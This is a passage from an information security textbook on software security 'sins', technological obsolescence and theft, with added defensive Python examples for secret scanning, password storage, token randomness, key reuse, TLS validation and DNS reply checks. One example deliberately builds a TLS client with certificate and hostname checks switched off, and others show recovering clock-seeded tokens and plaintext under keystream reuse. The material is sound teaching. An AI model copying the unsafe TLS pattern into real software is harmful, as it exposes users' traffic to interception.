encryption keys, or other sensitive information—can put that information at risk of disclosure.
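The “hard coding” of secrets described above can be caught by a simple source scan, and avoided by resolving the secret at run time from outside the code base. The following Python is an added example written for this edit (not from the textbook); the sample source text, the keyword list and the environment-variable name are constructed for the demonstration.

```python
"""Detecting hard-coded secrets in source, and loading them from outside the
code base instead. Added example (not from the textbook); the sample source
text and the keyword list are constructed for the demonstration."""
import os
import re
from typing import List, Mapping, Optional, Tuple

# Constructed sample source file: two hard-coded secrets and three benign lines.
SAMPLE_SOURCE = '''\
DB_HOST = "db.internal.example"
DB_PASSWORD = "hunter2"                 # secret baked into the program
api_key = 'EXAMPLEKEY-not-a-real-key'   # secret baked into the program
timeout = 30
password = os.environ["DB_PASSWORD"]    # resolved at run time: acceptable
'''

# A variable whose name suggests a secret, assigned a quoted string literal.
HARDCODED_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z0-9_]*(?:pass|secret|key|token)[A-Za-z0-9_]*)"
    r"\s*=\s*(?P<q>[\"'])(?P<value>[^\"']+)(?P=q)",
    re.IGNORECASE,
)


def find_hardcoded_secrets(source: str) -> List[Tuple[int, str]]:
    """Return (line number, variable name) for each suspicious assignment."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        match = HARDCODED_RE.match(line)
        if match:
            findings.append((lineno, match.group("name")))
    return findings


def load_secret(name: str, env: Optional[Mapping[str, str]] = None) -> str:
    """Hardened pattern: the secret is injected through the environment (or a
    secrets manager) and never appears in the source tree."""
    env = os.environ if env is None else env
    value = env.get(name)
    if not value:
        raise RuntimeError(f"required secret {name} is not configured")
    return value


def secret_is_configured(name: str, env: Optional[Mapping[str, str]] = None) -> bool:
    """True when load_secret() would succeed for this name."""
    try:
        load_secret(name, env)
    except RuntimeError:
        return False
    return True


if __name__ == "__main__":
    for lineno, name in find_hardcoded_secrets(SAMPLE_SOURCE):
        print(f"line {lineno}: {name} is assigned a literal secret")
```

A scan like this belongs in the build pipeline, where it turns a secret committed by mistake into a failed build rather than a disclosure; the name-based pattern is deliberately broad, so findings need a human look.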

The Sins of Mobile Code In this context, mobile code is an application, applet, macro, or script that may be embedded
in another application or document and thus downloaded and executed without the user even knowing, and
especially without consenting. Office suite tools are notorious for using macros, and third parties could insert mali-
cious content into existing office documents shared by users. Web pages also use mobile code with embedded scripts,
programs, and applets. Java has come under fire lately for its susceptibility to attack, to the point that many programs
won’t use Java. The same approach has been taken with ActiveX and Adobe Flash plug-ins. Mobile code in organiza-
tional applications should be reviewed and tested carefully to ensure that security vulnerabilities from the code don’t
cause problems.

Use of Weak Password-Based Systems The next set of sins involves the use of cryptography. For example, failure
to require sufficient password strength and to control incorrect password entry is a serious security issue. Password
policy can specify the acceptable number and type of characters, the frequency of mandatory changes, and even the
reusability of old passwords. Similarly, a system administrator can regulate the permitted number of incorrect pass-
word entries that are submitted and further improve the level of protection. Systems that do not validate passwords,
or that store passwords in easily accessible locations, are ripe for attack.
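The three controls named above (a strength policy, a limit on incorrect entries, and storage that does not expose the password) fit in a small amount of code. The following Python is an added example written for this edit, not from the textbook; the numeric limits and the sample passwords are illustrative choices, and the reuse check compares digests under the account's own salt.

```python
"""Password policy, failed-attempt lockout, and salted iterated hashing.
Added example (not from the textbook); the limits below are illustrative."""
import hashlib
import hmac
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MIN_LENGTH = 12            # policy: minimum number of characters
MAX_FAILED_ATTEMPTS = 5    # policy: lock the account after this many failures
HISTORY_DEPTH = 5          # policy: previous passwords that may not be reused
PBKDF2_ROUNDS = 100_000


def check_policy(password: str) -> List[str]:
    """Return the list of policy violations; an empty list means acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for pattern, label in ((r"[a-z]", "lowercase letter"), (r"[A-Z]", "uppercase letter"),
                           (r"\d", "digit"), (r"[^A-Za-z0-9]", "symbol")):
        if not re.search(pattern, password):
            problems.append(f"no {label}")
    return problems


def derive(password: str, salt: bytes) -> bytes:
    """Salted, iterated hash: what is stored is not the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


@dataclass
class Account:
    salt: bytes
    digest: bytes
    history: List[bytes] = field(default_factory=list)   # earlier digests, same salt
    failed_attempts: int = 0
    locked: bool = False


class PasswordStore:
    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}

    def set_password(self, user: str, password: str) -> None:
        problems = check_policy(password)
        if problems:
            raise ValueError("; ".join(problems))
        account = self.accounts.get(user)
        if account is None:
            salt = os.urandom(16)
            self.accounts[user] = Account(salt=salt, digest=derive(password, salt))
            return
        new_digest = derive(password, account.salt)
        if any(hmac.compare_digest(new_digest, old) for old in [account.digest] + account.history):
            raise ValueError("password was used recently")
        account.history = ([account.digest] + account.history)[:HISTORY_DEPTH]
        account.digest = new_digest
        account.failed_attempts = 0
        account.locked = False

    def verify(self, user: str, password: str) -> bool:
        """Constant-time comparison; counts failures and locks the account."""
        account = self.accounts.get(user)
        if account is None or account.locked:
            return False
        if hmac.compare_digest(derive(password, account.salt), account.digest):
            account.failed_attempts = 0
            return True
        account.failed_attempts += 1
        if account.failed_attempts >= MAX_FAILED_ATTEMPTS:
            account.locked = True
        return False

    def is_locked(self, user: str) -> bool:
        return self.accounts[user].locked


def try_set_password(store: PasswordStore, user: str, password: str) -> Optional[str]:
    """Return the rejection reason, or None when the password was accepted."""
    try:
        store.set_password(user, password)
    except ValueError as exc:
        return str(exc)
    return None
```

A locked account in this model stays locked until an administrator (or a later password change) clears it; production systems usually prefer a timed or escalating lockout so that an attacker cannot lock users out at will.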

Weak Random Numbers Most modern cryptosystems, like many other computer systems, use random number
generators. However, a decision support system that uses random and pseudorandom numbers for Monte Carlo
method forecasting does not require the same degree of rigor and the same need for true randomness as a system
that seeks to implement cryptographic procedures. These “random” number generators use a mathematical algorithm
based on a seed value and another system component (such as the computer clock) to simulate a random number.
Those who understand the workings of such a “random” number generator can predict particular values at particular
times.
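The point that a generator seeded from a system component such as the clock can be predicted is easy to show. The following Python is an added example written for this edit (not from the textbook): it produces a token from a Mersenne Twister seeded with a Unix timestamp, produces one from the operating system's CSPRNG through the secrets module, and includes an auditor's check that reports whether an observed token could have come from a clock-seeded generator. The timestamp and the search window are constructed values.

```python
"""Seeded pseudorandom output is reproducible; secrets-quality output is not.
Added example (not from the textbook). The clock-seeded token and the
recovery window are constructed to show the page's point, not a real scheme."""
import random
import secrets
import string
from typing import Optional

ALPHABET = string.ascii_letters + string.digits


def weak_token(seed: int, length: int = 16) -> str:
    """Token from a Mersenne Twister seeded with a small, guessable value
    (here a Unix timestamp, the page's 'computer clock' component)."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_token(length: int = 16) -> str:
    """Token from the operating system's CSPRNG via the secrets module."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def audit_clock_seeded_token(observed: str, issued_at: int,
                             window: int = 120) -> Optional[int]:
    """Auditor's check: could this token have come from a clock-seeded
    generator? Try every second in the window around the issue time and
    return the seed that reproduces it, or None if no seed does."""
    for candidate in range(issued_at - window, issued_at + window + 1):
        if weak_token(candidate, len(observed)) == observed:
            return candidate
    return None


if __name__ == "__main__":
    issued = 1_600_000_000   # constructed timestamp
    token = weak_token(issued)
    print("weak token:", token, "reproduced from seed", audit_clock_seeded_token(token, issued + 40))
    print("strong token:", strong_token(), "reproduced from seed", audit_clock_seeded_token(strong_token(), issued))
```

The audit function is the practical test: a few hundred trial seeds are enough to recognise a clock-seeded token, which is why session identifiers, keys and nonces must come from a cryptographic source (secrets or os.urandom in Python) rather than from random.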

Using Cryptography Incorrectly A wide variety of issues fall into this category. Cryptography is a powerful
tool to protect information, especially information that may travel outside the organization’s protective networks
and systems. Using untested or undertested cryptographic algorithms and programs can cause issues. Using weak
crypto keys or reusing the same crypto keys can cause issues, as can sending crypto keys through the same medium
as the encrypted messages. The challenges of using cryptography correctly require the organization to carefully
review and implement its technologies before trusting them to carry its sensitive data.
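Reusing a key is one of the sins listed above, and for stream-style encryption the consequence can be shown exactly. The following Python is an added example written for this edit (not from the textbook): two constructed messages are XORed with a keystream, and the code shows that when the same keystream is used twice, the XOR of the ciphertexts equals the XOR of the plaintexts, so knowing one message reveals the other. A fresh keystream per message removes the leak.

```python
"""Why a key (here a keystream) must never be reused: XOR of two ciphertexts
under the same keystream equals the XOR of the two plaintexts.
Added example (not from the textbook); the messages are constructed."""
import os
from typing import List

# Constructed messages (the second is the one the defender wants kept secret).
MESSAGE_1 = b"TRANSFER 1000 TO ACCOUNT 4477"
MESSAGE_2 = b"TRANSFER 9000 TO ACCOUNT 9999"


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def fresh_keystream(length: int) -> bytes:
    """One-time keystream from the OS CSPRNG: correct use is one per message."""
    return os.urandom(length)


def encrypt(plaintext: bytes, keystream: bytes) -> bytes:
    if len(keystream) < len(plaintext):
        raise ValueError("keystream too short")
    return xor_bytes(plaintext, keystream)


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If c1 and c2 share a keystream k: (p1 ^ k) ^ (p2 ^ k) = p1 ^ p2.
    The key cancels out and the relationship between plaintexts is exposed."""
    return xor_bytes(c1, c2)


def positions_that_differ(c1: bytes, c2: bytes) -> List[int]:
    """Under a reused keystream, identical plaintext bytes give identical
    ciphertext bytes, so the differing positions map the plaintext differences."""
    return [i for i, (x, y) in enumerate(zip(c1, c2)) if x != y]


def demo(reuse: bool) -> bytes:
    """Encrypt both messages; with reuse=True the sin is committed. Returns
    what someone holding c1, c2 and the first plaintext learns about p2."""
    k1 = fresh_keystream(len(MESSAGE_1))
    k2 = k1 if reuse else fresh_keystream(len(MESSAGE_2))
    c1, c2 = encrypt(MESSAGE_1, k1), encrypt(MESSAGE_2, k2)
    return xor_bytes(keystream_reuse_leak(c1, c2), MESSAGE_1)


if __name__ == "__main__":
    print("reused keystream, recovered p2:", demo(reuse=True))
    print("fresh keystream, recovered p2: ", demo(reuse=False))
```

The same algebra applies to any cipher that generates a keystream from a key and nonce, which is why nonce reuse with a stream cipher or counter-mode block cipher is treated as a key-reuse failure in reviews.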

Failure to Protect Network Traffic The final set of “sins” focuses on issues associated with networking. For exam-
ple, with the growing popularity of wireless networking comes a corresponding increase in the risk that wirelessly
transmitted data will be intercepted. Most wireless networks are installed and operated with little or no protection for
the information that is broadcast between the client and the network wireless access point. This is especially true of
public networks found in coffee shops, bookstores, and hotels. Without appropriate encryption such as that afforded
by WPA, attackers can intercept and view your data. Traffic on a wired network is also vulnerable to interception in
some situations. On networks using hubs instead of switches, any user can install a packet sniffer and collect com-
munications to and from users on that network. Periodic scans for unauthorized packet sniffers and unauthorized
connections to the network, as well as general awareness of the threat, can mitigate this problem.

Improper Use of PKI, Especially SSL Public key infrastructure (PKI), described in Module 10, is currently the gold
standard for securing network communications. One of the biggest challenges in PKI is certificate management. There
is a great deal of “trust” associated with the use of PKI, and a lot of that trust is manifested in certificates that must
be properly passed around between systems, like an ID card, so that access can be granted. The mishandling of PKI
certificates can cause issues, including improper validation of credentials. As a result, a person or system that should
get access doesn’t, and a person or system that shouldn’t have access may get it. Many programs in PKI also revolve
around the use of Secure Sockets Layer (SSL), which programmers use to transfer sensitive data, such as credit card
numbers and other personal information, between a client and server. While most programmers assume that using SSL
guarantees security, they often mishandle this technology. SSL and its successor, Transport Layer Security (TLS), both
need certificate validation to be truly secure. Failure to use Hypertext Transfer Protocol Secure (HTTPS) to validate
the certificate authority and then the certificate itself, or failure to validate the information against a certificate revo-
cation list (CRL), can compromise the security of SSL traffic. You will learn much more about cryptographic controls
in Module 10.
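Whether an SSL/TLS client actually validates the certificate chain and the host name is a property of its configuration, and it can be checked before any connection is made. The following Python is an added example written for this edit (not from the textbook or from any particular library): it builds a correctly validating client context with the standard ssl module, builds the common mistaken one in which validation has been switched off, and provides a check and a repair function for a context.

```python
"""Checking that a TLS client context really validates the server.
Added example (not from the textbook); it uses only the standard ssl module."""
import ssl
from typing import Dict


def make_safe_context() -> ssl.SSLContext:
    """create_default_context() loads the system CA store, requires a
    certificate chain (CERT_REQUIRED) and matches it to the host name."""
    return ssl.create_default_context()


def make_unsafe_context() -> ssl.SSLContext:
    """The common 'fix' for a certificate error: switch validation off. Any
    server that presents any certificate is then accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before CERT_NONE is allowed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def describe(ctx: ssl.SSLContext) -> Dict[str, object]:
    """The three settings a reviewer looks at first."""
    return {
        "verify_mode": ctx.verify_mode.name,
        "check_hostname": ctx.check_hostname,
        "minimum_version": ctx.minimum_version.name,
    }


def validates_peer(ctx: ssl.SSLContext) -> bool:
    """True only if the chain is verified against trusted CAs and the
    certificate's name is matched to the host being contacted."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and ctx.check_hostname


def harden(ctx: ssl.SSLContext) -> ssl.SSLContext:
    """Repair a context in place: verification on, host-name check on,
    trusted roots loaded, legacy protocol versions refused."""
    ctx.verify_mode = ssl.CERT_REQUIRED     # set before check_hostname: ssl enforces the order
    ctx.check_hostname = True
    ctx.load_default_certs()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


if __name__ == "__main__":
    for label, ctx in (("safe", make_safe_context()), ("unsafe", make_unsafe_context())):
        print(label, describe(ctx), "validates peer:", validates_peer(ctx))
    print("repaired", describe(harden(make_unsafe_context())))
```

Revocation checking, the last item the paragraph names, is a separate setting: the ssl module's verify_flags can be given VERIFY_CRL_CHECK_LEAF, but only after a current CRL has been loaded with load_verify_locations, otherwise every connection fails; many deployments rely on OCSP or short-lived certificates instead.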

Trusting Network Name Resolution The DNS (Domain Name System) is the service that converts the host name in a URL like www.cengage.com into the IP address of the Web server host. This distributed model is vulnerable to attack or “poisoning.” DNS cache poisoning involves compromising a DNS server and then changing the valid IP address associated with a domain name into one the attacker chooses, usually a fake Web site designed to obtain personal information or one that accrues a benefit to the attacker—for example, redirecting shoppers from a competitor’s Web site. Such attacks are usually more sinister, however; for instance, a simulated banking site used for a phishing attack might harvest online banking information.

How does someone get this fake information into the DNS server? Aside from a direct attack against a root DNS server, most attempts are made against primary and secondary DNS servers, which are local to an organization and part of the distributed DNS system. Other attacks attempt to compromise the DNS servers further up the DNS distribution model—those of ISPs or backbone connectivity providers. The DNS relies on a process of automated updates that can be exploited. Attackers most commonly compromise segments of the DNS by attacking the name of the name server and substituting their own DNS primary name server, by incorrectly updating an individual record, or by responding before the actual DNS server can. In the last type of attack, the attacker tries to discover a delay in a name server or to introduce a delay, as in a DoS attack. When the delay is in place, the attacker can set up another server to respond as if it were the actual DNS server, before the real DNS server can respond. The client accepts the first set of information it receives and is directed to that IP address.
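The last attack described above succeeds only if the client accepts whatever reply arrives first. The following Python is an added example written for this edit (not from the textbook): it builds a DNS query in wire format with a random transaction ID, builds replies, and shows the checks a resolver applies before trusting a reply, namely that it came from the server that was asked, echoes the transaction ID, is flagged as a response, and repeats the question exactly. Names, addresses (from the documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24) and the resolver address are constructed.

```python
"""What a resolver must check before trusting a DNS reply. Added example
(not from the textbook); the packets, names and addresses are constructed."""
import secrets
import struct
from typing import Tuple

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels ending in a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(name: str) -> Tuple[int, bytes]:
    """Standard query with an unpredictable 16-bit transaction ID."""
    txid = secrets.randbits(16)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set
    return txid, header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_response(txid: int, name: str, ipv4: str, ttl: int = 300) -> bytes:
    """Response carrying one A record (used below both for the genuine reply
    and for the constructed forged replies the checks must reject)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA set
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(octet) for octet in ipv4.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def question_section(packet: bytes) -> bytes:
    """Bytes of the first question: name, QTYPE and QCLASS."""
    i = 12
    while packet[i] != 0:
        i += 1 + packet[i]
    return packet[12:i + 5]


def accept_response(query: bytes, response: bytes,
                    queried_server: str, source: str) -> Tuple[bool, str]:
    """A reply is usable only if it came from the server that was asked,
    echoes our transaction ID, is flagged as a response and repeats our
    question exactly. A reply racing the real server must get all of these
    right; the random ID (and, in practice, a random source port) is what
    makes that guess hard."""
    if source != queried_server:
        return False, "reply from an unexpected address"
    if len(response) < 12:
        return False, "truncated header"
    qid = struct.unpack("!H", query[:2])[0]
    rid, rflags, rqdcount = struct.unpack("!HHH", response[:6])
    if rid != qid:
        return False, "transaction ID mismatch"
    if not rflags & 0x8000:
        return False, "QR bit clear: not a response"
    if rqdcount != 1 or question_section(response) != question_section(query):
        return False, "question section does not match the query"
    return True, "accepted"


def first_a_record(response: bytes) -> str:
    """Dotted-quad address from the first answer record."""
    offset = 12 + len(question_section(response))          # start of answer RR
    _, _, _, rdlength = struct.unpack("!HHIH", response[offset + 2:offset + 12])
    rdata = response[offset + 12:offset + 12 + rdlength]
    return ".".join(str(b) for b in rdata)


if __name__ == "__main__":
    txid, query = build_query("www.example.test")
    reply = build_response(txid, "www.example.test", "192.0.2.10")
    print(accept_response(query, reply, "10.0.0.53", "10.0.0.53"), first_a_record(reply))
```

These checks are what a stub resolver or caching server does; they do not authenticate the data itself, which is what DNSSEC signatures add on top.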

Neglecting Change Control One of the topics associated with an earlier version of “deadly sins” that has fallen off
the newer list is more of a managerial topic, and is worthy of discussion. Developers use a process known as change
control to ensure that the working system delivered to users represents the intent of the developers. Early in the
development process, change control ensures that developers do not work at cross purposes by altering the same
programs or parts of programs at the same time. Once the system is in production, change control processes ensure
that only authorized changes are introduced and that all changes are adequately tested before being released.

Technological Obsolescence
Antiquated or outdated infrastructure can lead to unreliable and untrustworthy systems. Management must recognize
that when technology becomes outdated, there is a risk of losing data integrity from attacks. Management’s strategic
planning should always include an analysis of the technology currently in use. Ideally, proper planning by management
should prevent technology from becoming obsolete, but when obsolescence is clear, management must take immediate
action. IT professionals play a large role in the identification of probable obsolescence.
Recently, the software vendor Symantec retired support for a legacy version of its popular antivirus software,
and organizations that wanted continued product support were obliged to upgrade immediately to a different version
of antivirus software. In organizations where IT personnel had kept management informed of the coming retirement,
these replacements were made more promptly and at lower cost than in organizations where the software had become
obsolete.
Perhaps the most significant case of technology obsolescence in recent years is Microsoft’s Windows XP.
This desktop operating system was dominant in the market for many years, beginning in 2001. The OS evolved
over time into multiple variations such as XP Pro and XP Home, received feature and capability upgrades
in three service packs, and even made the transition to new processors with a 64-bit edition. It was superseded
in the corporation’s lineup of desktop operating systems by Microsoft Vista in January 2007. However, it retained
a large following of users and remained in widespread use for many years. Microsoft discontinued support for
Windows XP in April 2014. Many industries and organizations built critical elements of their business systems and
even their infrastructure control systems on top of Windows XP, or they used it as an embedded operating system
inside other systems, such as automated teller machines and power generating and control systems. Similar issues
seem to follow other Windows variants, as users get comfortable with a particular OS and then seem reluctant to
upgrade to a newer version.
Figure 2-20 shows other examples of obsolete technology, including removable storage media in 8-inch, 5-inch, and
3.5-inch formats as well as open-reel magnetic tape.

Theft
The threat of theft is a constant. The value of information is diminished when it is copied without the owner’s knowl-
edge. Physical theft can be controlled easily using a wide variety of measures, from locked doors to trained security
personnel and the installation of alarm systems. Electronic theft, however, is a more complex problem to manage and
control. When someone steals a physical object, the loss is easily detected; if it has any importance at all, its absence
is noted. When electronic information is stolen, the crime is not always readily apparent. If thieves are clever and cover
their tracks carefully, the crime may remain undiscovered until it is too late.
Theft is often an overlapping category with software attacks, espionage or trespass, information extortion,
and compromises to intellectual property. A hacker or other individual threat agent could access a system and
commit most of these offenses by downloading a company’s information and then threatening to publish it if
not paid.
The increasing use of mobile technology, including smartphones, tablet PCs, and laptops, increases the risk of data theft. More disconcerting than the loss of data is the chance that the user has allowed the mobile device to retain account credentials, allowing the thief to use legitimate access to get into business or personal accounts that belong to the victim.

theft
The illegal taking of another’s property, which can be physical, electronic, or intellectual.

Figure 2-20 Obsolete technologies



Closing Scenario
Shortly after the SLS Board of Directors meeting, Charlie was named chief information security officer to fill a new leadership
position created to report to the CIO, Gladys Williams. The primary role of the new position is to provide leadership for SLS’s
efforts to improve its information security profile.

Discussion Questions

1. Before the discussion at the start of this module, how did Fred, Gladys, and Charlie each perceive the scope and
scale of the new information security effort? Did Fred’s perception change after the discussion?
2. How should Fred measure success when he evaluates Gladys’ performance for this project? How should he
evaluate Charlie’s performance?
3. Which of the threats discussed in this module should receive Charlie’s attention early in his planning process?

Ethical Decision Making


1. Suppose Charlie has made great progress in planning to improve the security program at the company. After
many weeks of planning and careful implementation, a formal plan is ready for presentation to the Board of
Directors. Gladys asks Charlie to prepare a written report and a presentation for Gladys to give to the Board.
Gladys edits the presentation to make it seem that she prepared the work herself with Fred’s assistance, but
without any mention of Charlie’s contributions. Is Gladys acting ethically? What may be some consequences of
her actions?
2. Suppose that SLS has implemented the policy prohibiting use of personal USB drives at work. Also, suppose
that Davey Martinez brought in the USB drive he had used to store last month’s accounting worksheet. When he
plugged in the drive, the worm outbreak started again and infected two servers. When Charlie finds out about
this violation of policy, he confronts Davey and gives him a verbal dressing down that includes profanity and
threats. Is Charlie acting ethically?

Selected Readings
• The journal article “Enemy at the Gates: Threats to Information Security,” by Michael Whitman, was published in
Communications of the ACM in August 2003, on pages 91–96. An abstract is available from the ACM Digital Library at
www.acm.org. Journal access may be available through your local library.
• The Art of War by Sun Tzu. Many translations and editions are widely available, both print and online.
• 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them, by M. Howard, D. LeBlanc, and J. Viega, is
published by McGraw-Hill/Osborne Publishing.

Module Summary
Information security performs four important functions to ensure that information assets remain safe and use-
ful: protecting the organization’s ability to function, enabling the safe operation of applications implemented
on the organization’s IT systems, protecting the data an organization collects and uses, and safeguarding the
organization’s technology assets.
To make sound decisions about information security, management must be informed about threats to its
people, applications, data, and information systems, and the attacks they face.

Threats are any events or circumstances that have the potential to adversely affect operations and assets. An
attack is an intentional or unintentional act that can damage or otherwise compromise information and the
systems that support it. A vulnerability is a potential weakness in an asset or its defensive controls.
Threats or dangers facing an organization’s people, information, and systems fall into the following categories:
❍ Compromises to intellectual property—Intellectual property, such as trade secrets, copyrights, trademarks, or patents, are intangible assets that may be attacked via software piracy or the exploitation of asset protection controls.
❍ Deviations in quality of service—Organizations rely on services provided by others. Losses can come from interruptions to those services.
❍ Espionage or trespass—Asset losses may result when electronic and human activities breach the confidentiality of information.
❍ Forces of nature—A wide range of natural events can overwhelm control systems and preparations to cause losses to data and availability.
❍ Human error or failure—Losses to assets may come from intentional or accidental actions by people inside and outside the organization.
❍ Information extortion—Stolen or inactivated assets may be held hostage to extract payment of ransom.
❍ Sabotage or vandalism—Losses may result from the deliberate sabotage of a computer system or business, or from acts of vandalism. These acts can either destroy an asset or damage the image of an organization.
❍ Software attacks—Losses may result when attackers use software to gain unauthorized access to systems or cause disruptions in systems availability.
❍ Technical hardware failures or errors—Technical defects in hardware systems can cause unexpected results, including unreliable service or lack of availability.
❍ Technical software failures or errors—Software used by systems may have purposeful or unintentional errors that result in failures, which can lead to loss of availability or unauthorized access to information.
❍ Technological obsolescence—Antiquated or outdated infrastructure can lead to unreliable and untrustworthy systems that may result in loss of availability or unauthorized access to information.
❍ Theft—Theft of information can result from a wide variety of attacks.

Review Questions
1. Why is information security a management problem? What can management do that technology cannot?
2. Why is data the most important asset an organization possesses? What other assets in the organization require protection?
3. Which management groups are responsible for implementing information security to protect the organization’s ability to function?
4. Has the implementation of networking technology, such as the cloud, created more or less risk for businesses that use information technology? Why?
5. What is information extortion? Describe how such an attack can cause losses, using an example not found in the text.
6. Why are employees among the greatest threats to information security?
7. How can you protect against shoulder surfing?
8. How has the perception of the hacker changed over recent years? What is the profile of a hacker today?
9. What is the difference between a skilled hacker and an unskilled hacker, other than skill levels? How does the protection against each differ?
10. What are the various types of malware? How do worms differ from viruses? Do Trojan horses carry viruses or worms?
11. Why does polymorphism cause greater concern than traditional malware? How does it affect detection?
12. What is the most common violation of intellectual property? How does an organization protect against it? What agencies fight it?
13. What are the various forces of nature? Which type might be of greatest concern to an organization in Las Vegas? Jakarta? Oklahoma City? Amsterdam? Miami? Tokyo?
14. How is technological obsolescence a threat to information security? How can an organization protect against it?
15. Does the intellectual property owned by an organization usually have value? If so, how can attackers threaten that value?
16. What are the types of password attacks? What can a systems administrator do to protect against them?
17. What is the difference between a denial-of-service attack and a distributed denial-of-service attack? Which is more dangerous? Why?
18. For a sniffer attack to succeed, what must the attacker do? How can an attacker gain access to a network to use the sniffer system?
19. What methods would a social engineering hacker use to gain information about a user’s login ID and password? How would these methods differ depending on the user’s position in the company?
20. What is a buffer overflow, and how is it used against a Web server?

Exercises
1. Consider that an individual threat agent, like a hacker, can be a factor in more than one threat category. If a
hacker breaks into a network, copies a few files, defaces a Web page, and steals credit card numbers, how many
different threat categories does the attack fall into?
2. Using the Web, research Mafiaboy’s exploits. When and how did he compromise sites? How was he caught?
3. Search the Web for “The Official Phreaker’s Manual.” What information in this manual might help a security
administrator to protect a communications system?
4. This module discussed many threats and vulnerabilities to information security. Using the Web, find at least two
other sources of information about threats and vulnerabilities. Begin with www.securityfocus.com and use a key-
word search on “threats.”
5. Using the categories of threats mentioned in this module and the various attacks described, review several cur-
rent media sources and identify examples of each threat.

References
1. Wood, Charles C. Information Security Policies Made Easy. 10th Edition. InformationShield. 2008.
2. Sun-Tzu Wu. “Sun Tzu’s The Art of War.” Translation by the Sonshi Group. Accessed May 31, 2016, from www.sonshi.com/sun-tzu-art-of-war-translation-original.html.
3. Internet World Stats. “Internet Usage Statistics: The Internet Big Picture, World Internet Users and Population Stats.” Accessed July 14, 2020, from www.internetworldstats.com/stats.htm.
4. Whitman, M., and Mattord, H. 2015 SEC/CISE Threats to Information Protection Report. Security Executive Council. www.securityexecutivecouncil.com.
5. Ibid.
6. Ibid.
7. Ibid.
8. Whitman, M., and Mattord, H. “Threats to Information Security Revisited.” Journal of Information Systems Security 8, no. 1 (2012): 21, 41. www.jissec.org/.
9. Business Software Alliance. “Software Management: Security Imperative, Business Opportunity.” 2018. Accessed July 14, 2020, from https://gss.bsa.org/wp-content/uploads/2018/05/2018_BSA_GSS_Report_en.pdf.
10. Microsoft. “Microsoft License Terms.” Accessed August 10, 2020, from www.microsoft.com/en-us/useterms.
11. Patton, Natalie. “Bootlegged Software Could Cost Community College.” Las Vegas Review Journal Online. September 18, 1997. Accessed May 24, 2016, from http://nl.newsbank.com/nl-search/we/Archives?.
12. Fusion Connect. “Infographic: The Cost of Downtime.” Accessed August 12, 2020, from www.fusionconnect.com/blog/blog-archive/infographic-the-cost-of-downtime/?megapath.
13. Chowdhry, Pankaj. “The Gibraltar Hack: Anatomy of a Break-in.” PCWeek 16, no. 41 (1999): 1, 22.
14. Ibid.
15. Rosencrance, Linda. “Teen Hacker ‘Mafiaboy’ Sentenced.” ComputerWorld Online. Accessed May 24, 2016, from www.computerworld.com/article/2583318/security0/teen-hacker-mafiaboy-sentenced.html.
16. Kaspersky. “Top 10 Most Notorious Hackers of All Time.” Accessed August 10, 2020, from www.kaspersky.com/resource-center/threats/top-ten-greatest-hackers.
17. Ibid.
18. Mitnick, K., and Simon, W. The Art of Deception: Controlling the Human Element of Security. Wiley Publishing, Inc., Indianapolis, 2002.
19. “Edward Snowden: A Timeline.” NBC News. Accessed May 23, 2016, from www.nbcnews.com/feature/edward-snowden-interview/edward-snowden-timeline-n114871.
20. Goldman, David. “Jailbreaking iPhone Apps is Now Legal.” CNN Money. July 26, 2010. Accessed August 10, 2020, from http://money.cnn.com/2010/07/26/technology/iphone_jailbreaking/.
21. Hackthissite.org. Accessed August 10, 2020, from www.hackthissite.org/.
22. Webopedia. “Static Electricity and Computers.” Accessed August 10, 2020, from www.webopedia.com/DidYouKnow/Computer_Science/static.asp.
23. Del Rey, Jason. “Amazon’s Massive AWS Outage Was Caused by Human Error.” Vox. Accessed August 11, 2020, from www.vox.com/2017/3/2/14792636/amazon-aws-internet-outage-cause-human-error-incorrect-command.
24. Kennedy, James T. “Internet Intricacies: Don’t Get Caught in the Net.” Contingency Planning & Management 3, no. 1: 12.
25. Abreu, Elinor. “Hacker Kevin Mitnick speaks out.” CNN. Accessed August 10, 2020, from www.cnn.com/2000/TECH/computing/09/29/open.mitnick.idg/.
26. FBI Internet Crime Complaint Center. “2019 Internet Crime Report.” Accessed August 11, 2020, from https://pdf.ic3.gov/2019_IC3Report.pdf.
27. The 419 Coalition. Accessed August 11, 2020, from https://419coalition.org/.
28. CERT Advisory CA-1991-03. “Unauthorized Password Change Requests Via Email Messages.” Accessed August 10, 2020, from https://resources.sei.cmu.edu/asset_files/WhitePaper/1991_019_001_496244.pdf.
29. “Rebuffed Internet Extortionist Posts Stolen Credit Card Data.” CNN Online. January 10, 2000.
30. Lewis, Truman. “Express Scripts Extortion Scheme Widens.” Consumer Affairs. September 30, 2009. Accessed August 10, 2020, from www.consumeraffairs.com/news/index/2009/09/.
